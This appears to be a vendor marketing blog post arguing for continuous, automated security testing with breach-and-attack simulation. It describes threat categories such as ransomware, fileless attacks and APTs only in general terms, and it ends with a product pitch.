What if security teams could take back the advantage of time? Instead of ‘waiting’ for an attacker to find their exposure points, they would find their security gaps first. While it may sound dramatic, that is exactly what most companies do when it comes to testing the effectiveness of their security controls.
Rather than proactively challenging their security defenses, to determine if they are safe right now, most companies tend to wait until their next periodic pen test or red team exercise. And while vulnerability scans, penetration tests and red team exercises are effective at uncovering gaps, relying on tests that are—at best—performed on a monthly basis is risky.
Continuous Security Testing 101
Continuous security testing is the practice of challenging, measuring and optimizing security controls on an ongoing basis with the objective of continually reducing an organization’s attack surface and improving its security posture. Echoing Gartner’s CARTA model, which advocates moving from point-in-time security decisions to more continuous security processes, continuous security testing leverages automated testing tools to give back to security teams the advantage of time.
According to a recent SANS Institute poll, only 14.1% of organizations test their security on a weekly basis, the rest of them testing only on a monthly (19.7%), quarterly (21.7%) annual(26.3%) or occasional basis (15.7%), or only after an incident or breach occurs (2.5%).
Figure 1: Continuous security testing helps defend against the latest threats faster
Motives for Continuous Control Validation
But if your organization isontinuous securit looking to take a ‘lean forward’ stance to its cyber posture, rather than rely on months-old reports from previous engagements; if it’s looking to preemptively find security holes before threat actors do, then automated, cy risk assessments should be at the top of your list. Here’s why:
• New threats emerge daily – According to av-test.org, 350,000 new malware strains and potentially unwanted applications are identified on a daily basis. With so many new indicators of compromise (IoCs) to identify, it stands to reason to ensure your security controls are catching these variants as frequently as you can.
These types of immediate threats may include ransomware payloads, banking Trojans, generic keyloggers, cryptominers, cryptostealers and other menaces.
• Stealth techniques evolve – New tactics, techniques and procedures (TTPs) are continually discovered and exploited in the wild, which may or may not be detected by traditional security controls. It is therefore advisable to check that behavior-based detection tools such as sandboxes, EDRs, EPPs, NGAVs and other tools that leverage machine-learning can spot suspicious maneuvers when they occur.
These include evasion-by-design techniques such as file obfuscation to thwart AV software, C2 communications kept hidden via encryption, and others. Identifying fileless attacks using living-off-the-land techniques also requires behavior -based detection tools, as these exploit legitimate tools such as PowerShell and Regsvr32 to mask malicious activity.
• IT environments change frequently – Day to day operations may inadvertently affect an organization’s security posture. Network policy changes, tool configuration updates, the rollout of new applications or software and the addition of new endpoints, servers and cloud service may all create cracks in your defenses. Are your crown jewels still protected?
The only way to know if your SIEM is generating critical alerts from your security arsenal of 20, 40 or more security controls is to test it following any change made to your IT environment, moving from speculation to simulation.
• State sponsored threat actors – Most organizations cannot compete with the resources of state-sponsored APT groups. Equipped with the knowhow and resources needed to discover and exploit vulnerabilities, as well as the time required to perform reconnaissance.
APTs start with credible spear-phishing emails, gain a foothold on ‘patient 0’ using advanced TTPs and move laterally in your network to find critical and lucrative information assets.
As your adversary’s day job is to attack and compromise your network, continually testing across the APT kill chain, from pre-exploitation (attack delivery) to exploitation (system compromise) to post-exploitation (action on objectives) enables your organization to consistently reduce its attack surface to thwart sophisticated attacks.
• Touchpoints with supply chains – Save for air-gapped networks used by government and military organizations, no company is an island. Companies usually interface to some extent with customers, suppliers and contractors to offer services, enable transactions and collaborate.
Figure 2: Threat Modeling using MITRE ATT&CK enables testing across various TTPs
Health Information Exchanges (or HIEs) bridge between pharmacies, healthcare providers and insurance plans. Payment gateways connect customers to merchants and card schemes. And threat actors are known to launch water-holing attacks by exploiting IT ticketing portals and MSSP websites, disguising malware infection points as links to software updates. Frequently challenging your controls against these potential touchpoints helps reduce the risk arising from supply chain attacks.
Explore Testing À La Continuous
Ready to experience automated security risk assessments using breach and attack simulation technology?
Download the brochure, read about Testing Security Effectiveness with the MITRE ATT&CK™ solution brief, or sign up for a free trial today.
Figure 3: Automated, continuous testing with Cymulate’s breach and attack simulation platform